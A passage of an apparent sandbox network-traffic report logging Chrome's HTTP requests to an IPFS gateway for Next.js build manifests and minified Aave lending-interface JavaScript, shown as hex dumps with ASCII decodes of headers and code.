                                                                                                                                                                                                                                                  Data Ascii: _harmony_v3"===n?"https://snapshot.org/#/aave.eth/proposal/0x81a78109941e5e0ac6cb5ebf82597c839c20ad6821a8c3ff063dba39032533d4":n&&"proto_fantom_v3"===n?"https://snapshot.org/#/aave.eth/proposal/0xeefcd76e523391a14cfd0a79b531ea0a3faf0eb4a058e255fac13a2d224
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 72 61 77 2c 20 62 6f 72 72 6f 77 73 20 61 6e 64 20 72 65 70 61 79 73 20 61 72 65 20 69 6d 70 61 63 74 65 64 2e 22 7d 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 69 2e 5a 2c 7b 61 72 72 6f 77 3a 21 30 2c 70 6c 61 63 65 6d 65 6e 74 3a 22 74 6f 70 22 2c 50 6f 70 70 65 72 43 6f 6d 70 6f 6e 65 6e 74 3a 63 2e 45 2c 74 69 74 6c 65 3a 28 30 2c 6c 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 70 79 3a 34 2c 70 78 3a 36 7d 2c 73 70 61 63 69 6e 67 3a 31 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 64 2c 7b 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 30 70 78 22 2c 63 6f 6c 6f 72 3a 22 65 72 72 6f 72 2e 6d 61 69 6e
                                                                                                                                                                                                                                                  Data Ascii: raw, borrows and repays are impacted."})},p=function(){return(0,l.jsx)(i.Z,{arrow:!0,placement:"top",PopperComponent:c.E,title:(0,l.jsx)(a.Z,{sx:{py:4,px:6},spacing:1,children:(0,l.jsx)(d,{})}),children:(0,l.jsx)(s.Z,{sx:{fontSize:"20px",color:"error.main
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 63 6f 6e 3a 28 30 2c 61 2e 6a 73 78 29 28 74 2e 5a 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 61 2e 6a 73 78 29 28 69 2e 4f 2c 7b 7d 29 7d 29 7d 7d 2c 31 34 33 37 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 33 36 38 36 34 29 2c 69 3d 72 28 34 39 35 30 31 29 2c 61 3d 72 28 35 38 35 32 37 29 2c 73 3d 72 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 6e 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e
                                                                                                                                                                                                                                                  Data Ascii: con:(0,a.jsx)(t.Z,{}),children:(0,a.jsx)(i.O,{})})}},14379:function(e,n,r){r.d(n,{B:function(){return d}});var t=r(59499),o=r(36864),i=r(49501),a=r(58527),s=r(85893);function c(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwn
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 22 50 65 72 20 74 68 65 20 63 6f 6d 6d 75 6e 69 74 79 2c 20 74 68 65 20 46 61 6e 74 6f 6d 20 6d 61 72 6b 65 74 20 68 61 73 20 62 65 65 6e 20 66 72 6f 7a 65 6e 2e 22 7d 29 3a 22 45 74 68 65 72 65 75 6d 20 41 4d 4d 22 3d 3d 3d 6e 3f 28 30 2c 73 2e 6a 73 78 29 28 74 2e 63 43 2c 7b 69 64 3a 22 50 65 72 20 74 68 65 20 63 6f 6d 6d 75 6e 69 74 79 2c 20 74 68 65 20 56 32 20 41 4d 4d 20 6d 61 72 6b 65 74 20 68 61 73 20 62 65 65 6e 20 64 65 70 72 65 63 61 74 65 64 2e 22 7d 29 3a 6e 75 6c 6c 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 22 48 61 72 6d 6f 6e 79 22 3d 3d 3d 65 3f 6e 3f 22 68 74 74 70 73 3a 2f 2f 67 6f 76 65 72 6e 61 6e 63 65 2e 61 61 76 65 2e 63 6f 6d 2f 74 2f 68 61 72 6d 6f 6e 79 2d 68 6f 72 69 7a 6f 6e 2d 62 72 69 64 67 65
                                                                                                                                                                                                                                                  Data Ascii: "Per the community, the Fantom market has been frozen."}):"Ethereum AMM"===n?(0,s.jsx)(t.cC,{id:"Per the community, the V2 AMM market has been deprecated."}):null},l=function(e,n){return"Harmony"===e?n?"https://governance.aave.com/t/harmony-horizon-bridge
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 63 75 72 72 65 6e 74 4d 61 72 6b 65 74 2c 6c 3d 65 2e 73 68 6f 77 53 75 70 70 6c 79 43 61 70 54 6f 6f 6c 74 69 70 73 2c 64 3d 76 6f 69 64 20 30 21 3d 3d 6c 26 26 6c 2c 79 3d 65 2e 73 68 6f 77 42 6f 72 72 6f 77 43 61 70 54 6f 6f 6c 74 69 70 73 2c 67 3d 76 6f 69 64 20 30 21 3d 3d 79 26 26 79 2c 77 3d 65 2e 73 68 6f 77 44 65 62 74 43 65 69 6c 69 6e 67 54 6f 6f 6c 74 69 70 73 2c 5a 3d 76 6f 69 64 20 30 21 3d 3d 77 26 26 77 2c 43 3d 65 2e 69 73 49 73 6f 6c 61 74 65 64 2c 6b 3d 28 30 2c 6d 2e 6f 76 29 28 29 2c 4f 3d 6b 2e 73 75 70 70 6c 79 43 61 70 2c 44 3d 6b 2e 62 6f 72 72 6f 77 43 61 70 2c 50 3d 6b 2e 64 65 62 74 43 65 69 6c 69 6e 67 3b 72 65 74 75 72 6e 28 30 2c 62 2e 6a 73 78 73 29 28 70 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 62 2e 6a 73 78 29
                                                                                                                                                                                                                                                  Data Ascii: currentMarket,l=e.showSupplyCapTooltips,d=void 0!==l&&l,y=e.showBorrowCapTooltips,g=void 0!==y&&y,w=e.showDebtCeilingTooltips,Z=void 0!==w&&w,C=e.isIsolated,k=(0,m.ov)(),O=k.supplyCap,D=k.borrowCap,P=k.debtCeiling;return(0,b.jsxs)(p.Z,{children:[(0,b.jsx)


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  100192.168.2.549820209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC512OUTGET /_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:48 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 2368
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidsiqncwdmbtsaku6jagt4kvlz6h32ddofrp3nto5urbh7icajyra"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigqhvk42clxkx3275tgfrsk4nxd5bgdxfnph4by2yt356lna7aaze,bafkreidsiqncwdmbtsaku6jagt4kvlz6h32ddofrp3nto5urbh7icajyra
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 646871
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 63 34 65 39 31 34 33 30 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43c4e914302-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1298INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 63 2c 61 2c 65 2c 74 2c 6e 2c 69 2c 72 2c 66 2c 6b 2c 75 2c 68 2c 64 2c 6a 2c 62 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 73 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 33 36 34 35 2d 39 32 30 33 64 64 39 34 30 34 61 33 39 37 37 65 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 34 32 35 34 2d 61 63 30 64 64 33 33 66 35 61 65 38 33 39 64 33 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 31 35 37 33 2d 37 33 62 39 35 39 35 64 39 37 64 37 34 64 65 38 2e 6a 73 22 2c 6e 2c
                                                                                                                                                                                                                                                  Data Ascii: self.__BUILD_MANIFEST=function(s,c,a,e,t,n,i,r,f,k,u,h,d,j,b){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[s,"static/chunks/3645-9203dd9404a3977e.js","static/chunks/4254-ac0dd33f5ae839d3.js","static/chunks/1573-73b9595d97d74de8.js",n,
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1070INData Raw: 37 38 2d 35 37 30 66 31 39 34 62 66 39 39 31 66 33 35 66 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 73 74 61 6b 69 6e 67 2d 31 64 37 35 34 64 30 38 65 37 38 35 66 66 65 36 2e 6a 73 22 5d 2c 22 2f 76 33 2d 6d 69 67 72 61 74 69 6f 6e 22 3a 5b 73 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 31 31 30 32 2d 61 32 39 39 65 30 65 34 61 36 32 31 61 65 61 31 2e 6a 73 22 2c 63 2c 61 2c 65 2c 69 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 76 33 2d 6d 69 67 72 61 74 69 6f 6e 2d 63 62 33 39 36 30 66 35 34 62 39 33 62 31 64 30 2e 6a 73 22 5d 2c 73 6f 72 74 65 64 50 61 67 65 73 3a 5b 22 2f 22 2c 22 2f 34 30 34 22 2c 22 2f 35 30 30 22 2c 22 2f 5f 61 70 70 22 2c 22 2f 5f 65 72 72 6f 72 22 2c 22 2f 66 61 75 63 65
                                                                                                                                                                                                                                                  Data Ascii: 78-570f194bf991f35f.js","static/chunks/pages/staking-1d754d08e785ffe6.js"],"/v3-migration":[s,"static/chunks/1102-a299e0e4a621aea1.js",c,a,e,i,"static/chunks/pages/v3-migration-cb3960f54b93b1d0.js"],sortedPages:["/","/404","/500","/_app","/_error","/fauce


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  101192.168.2.549823209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC510OUTGET /_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:48 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 77
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidplnfkadjprvvo3gjvwryya27xvtxumtimdu4qeyhf7yt7qaggpy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigqhvk42clxkx3275tgfrsk4nxd5bgdxfnph4by2yt356lna7aaze,bafkreidplnfkadjprvvo3gjvwryya27xvtxumtimdu4qeyhf7yt7qaggpy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028482
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 63 34 61 35 36 64 65 39 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43c4a56de97-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC77INData Raw: 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 2c 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29 3b
                                                                                                                                                                                                                                                  Data Ascii: self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  102192.168.2.549821209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC517OUTGET /_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1356INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:48 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 92
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreig6knatcosnyxmyfssqvzfeshuexrpibmhuhhmh6bp4hfz4dn7fti"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigqhvk42clxkx3275tgfrsk4nxd5bgdxfnph4by2yt356lna7aaze,bafkreig6knatcosnyxmyfssqvzfeshuexrpibmhuhhmh6bp4hfz4dn7fti
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-02
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC89INData Raw: 41 67 65 3a 20 31 31 35 32 37 35 33 36 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 63 35 38 35 33 34 33 37 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Age: 11527536Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43c58534370-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC92INData Raw: 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 3d 5b 5d 3b 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29
                                                                                                                                                                                                                                                  Data Ascii: self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  103192.168.2.549824209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC511OUTGET /_next/static/chunks/pages/index-5c55ce06141b7657.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:49 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 117965
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihe6icljtcnqoqnmqwekoq2mlhsmnb3eg4n3m25eup2i75dflb3cu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/index-5c55ce06141b7657.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreihe6icljtcnqoqnmqwekoq2mlhsmnb3eg4n3m25eup2i75dflb3cu
                                                                                                                                                                                                                                                  2024-09-28 04:11:49 UTC139INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 6e 79 35 2d 30 34 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 31 33 30 32 38 34 38 33 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 34 33 34 38 33 33 30 63 62 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-ny5-04CF-Cache-Status: HITAge: 13028483Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e44348330cbd-EWR
